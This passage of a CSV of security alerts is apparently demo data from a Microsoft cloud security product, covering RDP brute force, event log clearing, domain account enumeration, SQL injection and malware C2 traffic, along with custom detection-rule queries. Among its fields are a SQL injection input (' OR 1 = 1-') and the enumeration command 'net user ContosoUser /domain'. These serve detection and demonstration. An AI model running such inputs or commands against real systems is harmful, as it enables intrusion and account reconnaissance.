14,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-05 02:02:00,2019-01-05 02:02:00,7f042810-8657-44e2-93ba-318ba108e3d6,8832e816-d634-4214-bb48-7a6678fdf0b7,InternalDemo,Microsoft,Failed RDP Brute Force Attack,Failed RDP Brute Force Attack,Failed RDP Brute Force Attack,"Several Remote Desktop login attempts were detected from FreeRDP (96.81.218.10), none of them succeeded.
Event logs analysis shows that in the last 48 minutes there were 93 failed attempts.
32 of the failed login attempts aimed at non-existent users.
1 of the failed login attempts aimed at existing users.",Low,False,"{
""source"": ""FreeRDP (96.81.218.10)"",
""successful logins"": ""0"",
""attack duration"": ""48 minutes"",
""failed attempts"": ""93"",
""non-existent users"": ""32"",
""existing users"": ""1"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm1"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1"",
""Type"": ""host""
}
]",Unknown,,"[
{
""Href"": ""https://v7cvxo4erctvostor.blob.core.windows.net/20170816-13/MSTI-TS-RDP-Brute-Forcing.pdf?sv=2015-12-11&sig=jgHYwnnNiM3vj6wbCse9e2cpMmrTuHd6nhzxJxmqv3s%3D&spr=https&se=2017-11-23T13%3A00%3A34Z&srt=o&ss=b&sp=r"",
""Category"": ""enrichment_tas_threat__reports"",
""Label"": ""Report: RDP Brute Forcing"",
""Type"": ""webLink""
}
]",,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1,,
15,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-07 05:02:00,2019-01-07 05:02:00,b29906e3-91b3-427f-8d93-efe648ade3ac,775505ce-0ef9-4945-b697-303f7666d1b6,InternalDemo,Microsoft,Modified system binary discovered in dump file 5bd767e4-2d08-4714-b744-aaed04b57107__391365252.hdmp,Modified system binary discovered in dump file 5bd767e4-2d08-4714-b744-aaed04b57107__391365252.hdmp,Modified system binary discovered in dump file 5bd767e4-2d08-4714-b744-aaed04b57107__391365252.hdmp,"Azure Security Center detected an image mismatch on a loaded module in memory during analysis of a crash dump. If the presence of this module is unexpected, it may indicate a system compromise.",High,False,"{
""DumpFile"": ""5bd767e4-2d08-4714-b744-aaed04b57107__391365252.hdmp"",
""ProcessName"": ""lync.exe"",
""ProcessVersion"": ""16.0.6001.1078"",
""ModuleName1"": ""ntdll"",
""ModuleVersion1"": ""6.3.9600.18233"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm3"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm3"",
""Type"": ""host""
}
]",Unknown,,,,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm3,,
16,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-01 00:02:00,2019-01-01 00:02:00,1d736be8-babe-40d5-811d-f443b124e45a,48facfa1-fe35-45ff-8c91-7a710cd462b9,InternalDemo,Microsoft,An event log was cleared,An event log was cleared,An event log was cleared,Machine logs indicate a suspicious event log clearing operation by user: 'internalUser' in Machine: 'vm3'. The Security log was cleared.,Low,False,"{
""domain name"": ""Contoso"",
""user name"": ""internalUser"",
""machine name"": ""vm3"",
""log channel"": ""Security"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm3"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm3"",
""Type"": ""host""
},
{
""$id"": ""5"",
""Name"": ""internaluser"",
""NTDomain"": ""contoso"",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": true,
""Type"": ""account""
}
]",Unknown,,,,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm3,,
17,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-06 04:02:00,2019-01-06 04:02:00,217a7303-a603-461d-b0eb-6586b8227a26,7b27ffab-7204-4856-a013-908de6c1804e,InternalDemo,Microsoft,Multiple Domain Accounts Queried,Multiple Domain Accounts Queried,Multiple Domain Accounts Queried,"Analysis of host data has determined that an unusual number of distinct domain accounts are being queried within a short time period from vm1 in your subscription. This kind of activity could be legitimate, but can also be an indication of compromise.",Low,False,"{
""Number of Queried Accounts Observed in 24 Hours"": ""8"",
""Latest Account Queried"": ""ContosoUser"",
""Compromised Host"": ""vm1"",
""Full Command"": ""net user ContosoUser /domain"",
""Queried By"": ""admin"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}",,Unknown,,,,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1,,vm1
18,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-05 01:02:00,2019-01-05 01:02:00,59f71190-b478-403a-81b1-5e163dd538e3,0c68e539-f060-401f-b967-6b64b8f49198,InternalDemo,F5 WAF,SQL injection blocked,SQL injection blocked,SQL injection blocked,SQL-Injection,Low,False,"{
""Hit Count"": ""6"",
""Source IPs"": ""[\""96.81.218.10\""]"",
""Management URL"": ""https://40.86.96.115:8443"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm1"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1"",
""Type"": ""host""
}
]",Unknown,,,,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1,,
19,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-09 05:02:00,2019-01-09 05:02:00,df47a8d3-472e-4323-9c2a-de8a0aec77e0,5fc4f6a0-0687-4b93-998e-a230af39c10b,InternalDemo,Deep Security Agent,Deep Security Agent detected a malware,Deep Security Agent detected a malware,Deep Security Agent detected a malware,Deep Security Agent detected a malware,Low,False,"{
""Malware"": ""Cookie_DoubleClick"",
""Infected Resource"": ""Internet Explorer Cache"",
""ScanAction"": ""Delete"",
""ScanResult"": ""SUCCESS"",
""Type"": ""AntiMalware"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm4"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm4"",
""Type"": ""host""
}
]",Unknown,,,,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm4,,
20,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-06 02:02:00,2019-01-06 02:02:00,e5e1e112-43df-4a5d-abcf-713e56ca29b6,3b2b5ecc-ec29-4703-9450-29b29b937fd8,InternalDemo,Microsoft,Successful RDP brute force attack,Successful RDP brute force attack,Successful RDP brute force attack,"Several Remote Desktop login attempts were detected from FreeRDP (96.81.218.10), some of which were able to successfully login to the machine.
Event logs analysis shows that in the last 30 minutes there were 60 failed attempts.
20 of the failed login attempts aimed at non-existent users.
1 of the failed login attempts aimed at existing users.",High,False,"{
""source"": ""FreeRDP (96.81.218.10)"",
""successful logins"": ""1"",
""attack duration"": ""30 minutes"",
""failed attempts"": ""60"",
""non-existent users"": ""20"",
""existing users"": ""1"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm1"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1"",
""Type"": ""host""
}
]",Unknown,,"[
{
""Href"": ""https://v7cvxo4erctvostor.blob.core.windows.net/20170816-13/MSTI-TS-RDP-Brute-Forcing.pdf?sv=2015-12-11&sig=jgHYwnnNiM3vj6wbCse9e2cpMmrTuHd6nhzxJxmqv3s%3D&spr=https&se=2017-11-23T13%3A00%3A34Z&srt=o&ss=b&sp=r"",
""Category"": ""enrichment_tas_threat__reports"",
""Label"": ""Report: RDP Brute Forcing"",
""Type"": ""webLink""
}
]",,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1,,
21,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-06 03:02:00,2019-01-06 03:02:00,bbf11a79-0ab2-4ee7-b2ec-1ad95890c9bc,614ae18e-cd79-4d4c-97dc-24431be12b5b,InternalDemo,Microsoft,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,The system process SVCHOST was observed running in an abnormal context. Malware often use SVCHOST to masquerade its malicious activity.,Low,False,"{
""domain name"": ""hpc"",
""user name"": ""E2EINTVM2$"",
""process name"": ""C:\\AlertGeneration\\svchost.exe"",
""command line"": ""C:\\AlertGeneration\\svchost.exe"",
""parent process"": ""-"",
""process id"": ""0x12c"",
""user sid"": ""S-1-5-18"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm1"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1"",
""Type"": ""host""
},
{
""$id"": ""5"",
""Name"": ""e2eintvm2$"",
""NTDomain"": ""hpc"",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": true,
""Type"": ""account""
},
{
""$id"": ""6"",
""Directory"": ""c:\\alertgeneration"",
""Name"": ""svchost.exe"",
""Type"": ""file""
},
{
""$id"": ""7"",
""CommandLine"": ""C:\\AlertGeneration\\svchost.exe"",
""ImageFile"": {
""$ref"": ""6""
},
""Account"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
}
]",Unknown,,"[
{
""Href"": ""https://v7cvxo4erctvostor.blob.core.windows.net/20170815-13/MSTI-TS-Suspicious-SVCHost.pdf?sv=2015-12-11&sig=8FlMfUQOaSDAvU7Ebt%2BC8idOLrah%2Fsz4yjr0iPIblS4%3D&spr=https&se=2017-11-22T13%3A44%3A45Z&srt=o&ss=b&sp=r"",
""Category"": ""enrichment_tas_threat__reports"",
""Label"": ""Report: Suspicious SVCHost"",
""Type"": ""webLink""
}
]",,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1,,
22,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-10 05:02:00,2019-01-10 05:02:00,83eeb504-3c2c-4c64-b309-f48653863bdd,5365ee7a-f730-42d2-bcdf-b2e898ab98d7,InternalDemo,Microsoft,Potential SQL Injection,Potential SQL Injection,Potential SQL Injection,Potential Sql Injection was detected on your database lianadb on server sqlserver2ascdemo.database.windows.net,High,False,"{
""Database"": ""sqli_users"",
""Server"": ""sqlserver2ascdemo.database.windows.net"",
""Principal name"": ""CONTOSOADMIN"",
""Application"": "".Net SqlClient Data Provider"",
""IP address"": ""13.33.36.3"",
""Vulnerable statement"": ""SELECT * FROM sqli_users WHERE username = 'user' AND password = \"" OR 1 = 1-'"",
""Potential causes"": ""Defect in application code constructing faulty SQL statements; application code doesn't sanitize user input and may be exploited to inject malicious SQL statements."",
""ActionTaken"": ""Detected"",
""resourceType"": ""SQL Server""
}","[
{
""$id"": ""4"",
""HostName"": ""sqlserver2ascdemo"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourceGroups/testingLab/providers/Microsoft.Sql/servers/myServer/databases/sqlserver2ascdemo"",
""Type"": ""host""
}
]",Unknown,,,,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourceGroups/testingLab/providers/Microsoft.Sql/servers/myServer/databases/sqlserver2ascdemo,,
23,802d39e1-9d70-404d-832c-2de5e2478eda,2018-12-30 00:02:00,2018-12-30 00:02:00,daf0ba4a-d1f9-4ac9-ac59-fa2077c8134d,a511e1bb-69e1-41a2-8054-c6fcb6aa2362,InternalDemo,Microsoft,Network communication with a malicious machine detected,Network communication with a malicious machine detected,Network communication with a malicious machine detected,"Network traffic analysis indicates that your machine (IP 1.2.3.5) has communicated with what is possibly a Command and Control center for a malware of type AldiBot at IP 183.95.154.13. AldiBot is an HTTP-controlled denial-of-service bot - it offers HTTP and TCP DDoS capabilities along with Firefox, Pidgin and jDownloader credential theft, the creation of a SOCKS5 proxy on infected machine, and the ability to download and execute malicious code of the attacker’s choice.",Medium,False,"{
""Attacker Port"": ""80"",
""Attacker IP"": ""183.95.154.13"",
""Victim Port"": ""23132"",
""Victim IP"": ""1.2.3.5"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm4"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm4"",
""Type"": ""host""
},
{
""$id"": ""5"",
""Address"": ""183.95.154.13"",
""Location"": {
""CountryCode"": ""CN"",
""CountryName"": ""China"",
""State"": ""Hubei"",
""City"": ""Wuhan"",
""Longitude"": 114.28946,
""Latitude"": 30.55397,
""Asn"": 4837
},
""Type"": ""ip""
}
]",Unknown,,,,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm4,,
24,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-11 05:38:06,2019-01-12 05:38:06,92f52d58-c6c4-426a-ae31-45693e585c9e,6b56aa8c-da76-4caf-b09d-8706292a8b89,CustomAlertRule,Alert Rule,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trus was created on Active Directory,High,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-12T05%3A38%3A06.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""22668"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""1000"",
""Total IP Entities"": ""1"",
""Total Account Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""23.54.94.45"",
""Type"": ""ip"",
""Count"": 22668
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 22668
},
{
""$id"": ""5"",
""Name"": ""brians"",
""UPNSuffix"": ""ContosoSI.onmicrosoft.com"",
""IsDomainJoined"": true,
""Type"": ""account"",
""Count"": 22668
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-12 05:48:11,,,
25,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-11 06:25:57,2019-01-12 06:25:57,5f98d315-1e47-47b4-98c5-365a9d0028f2,4586bd9e-5c1e-4229-9a01-ecd84ad51448,CustomAlertRule,Alert Rule,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication was identified based on TI,High,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-12T06%3A25%3A57.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""22992"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0"",
""Total Account Entities"": ""1565"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""80.10.26.89"",
""Type"": ""ip"",
""Count"": 22992
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 22992
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 5924
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 877
},
{
""$id"": ""7"",
""Name"": ""USER"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 482
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-12 06:36:03,,,
26,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-12 19:18:10,2019-01-12 20:18:10,6bbe2849-3194-4276-afbb-89dcefa9038a,d4638075-fed2-4031-8e52-d37c220b0fe4,CustomAlertRule,Alert Rule,Suspicious Account Added,Suspicious Account Added,Suspicious Account Added,Account added and removed from group within 24h,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""timeInterval\"":{\""intervalDuration\"":3600,\""intervalEnd\"":\""2019-01-12T20%3A18%3A10.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""1"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""60"",
""Suppression in Minutes"": ""720""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-12 20:28:24,,,
27,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-09 06:33:55,2019-01-10 06:33:55,b530adbb-40b3-4c69-8590-0e8ac8f4bc69,78cc7e02-6116-459d-9cdc-a6dcc40ba937,CustomAlertRule,Alert Rule,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,Domain controllers with Microsoft antimalware core engine failure,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-10T06%3A33%3A55.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""11661"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-10 06:43:59,,,
28,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-09 06:31:40,2019-01-10 06:31:40,9d815c5c-e4f2-4430-8be3-fee253574411,ace7fb98-ef96-46df-ba7b-9a15a141d368,CustomAlertRule,Alert Rule,DC local group addition - Demo,DC local group addition - Demo,DC local group addition - Demo,Domain controllers local group addition,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-10T06%3A31%3A40.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""11687"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""800"",
""Total Account Entities"": ""1713"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""75.10.91.22"",
""Type"": ""ip"",
""Count"": 11687
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 11687
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 3831
},
{
""$id"": ""6"",
""Name"": ""Administrator"",
""NTDomain"": ""DHCPContoso77"",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 2162
},
{
""$id"": ""7"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 720
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-10 06:41:45,,,
29,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-09 06:31:42,2019-01-10 06:31:42,ef9c04cb-333b-4465-9c62-55adc621d051,40a5916b-9697-423a-a5e4-95cca7c735e7,CustomAlertRule,Alert Rule,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Plao Alto admin logged on via SSH - Demo,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-10T06%3A31%3A42.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""11687"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""2000"",
""Total Account Entities"": ""1713"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""92.52.10.25"",
""Type"": ""ip"",
""Count"": 11687
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 11687
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 3831
},
{
""$id"": ""6"",
""Name"": ""Administrator"",
""NTDomain"": ""DHCPContoso77"",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 2162
},
{
""$id"": ""7"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 720
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-10 06:41:50,,,
30,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-09 05:38:06,2019-01-10 05:38:06,a7cb1196-efe7-4110-9a69-8e3c8609bd9b,9740fe80-b642-4a38-8e86-05fa4d35508b,CustomAlertRule,Alert Rule,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trus was created on Active Directory,High,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-10T05%3A38%3A06.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""12362"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""1000"",
""Total Host Entities"": ""1"",
""Total IP Entities"": ""1"",
""Total Account Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""23.54.94.45"",
""Type"": ""ip"",
""Count"": 12362
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 12362
},
{
""$id"": ""5"",
""Name"": ""brians"",
""UPNSuffix"": ""ContosoSI.onmicrosoft.com"",
""IsDomainJoined"": true,
""Type"": ""account"",
""Count"": 12362
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-10 05:48:09,,,
31,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-09 06:25:57,2019-01-10 06:25:57,d71c0a28-669f-4fc5-afb8-053e34e34728,04e14d6f-6d4f-46d4-a5f6-2a26bcd34ce8,CustomAlertRule,Alert Rule,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication was identified based on TI,High,False,"{
""Alert Mode"": ""Aggregated"",
